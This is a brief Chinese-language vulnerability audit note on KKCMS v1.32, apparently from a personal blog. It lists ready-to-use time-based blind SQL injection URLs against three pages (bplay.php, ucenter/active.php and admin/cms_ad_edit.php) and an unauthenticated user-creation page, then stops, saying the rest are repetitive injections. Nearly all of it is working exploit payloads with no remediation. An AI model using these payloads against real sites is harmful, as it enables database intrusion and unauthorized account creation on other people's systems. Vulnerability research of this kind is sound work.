KKCMS v1.32审计
KKCMS v1.32审计
前台注入1
1 | http://127.0.0.1:80/kkcms/bplay.php?play=a AND (SELECT 6254 FROM (SELECT(SLEEP(5)))hZmf) |
前台注入2
1 | http://127.0.0.1:80/kkcms/ucenter/active.php?verify=a' AND (SELECT 7219 FROM (SELECT(SLEEP(5)))VMtB) AND 'qLKJ'='qLKJ |
未授权添加用户
1 | http://127.0.0.1/kkcms/ucenter/cms_user_add.php |
后台注入
1 | http://127.0.0.1:80/kkcms/admin/cms_ad_edit.php?id=1 AND (SELECT 3894 FROM (SELECT(SLEEP(5)))RJzc) |
这套一堆都是重复的注入
没意思 不写了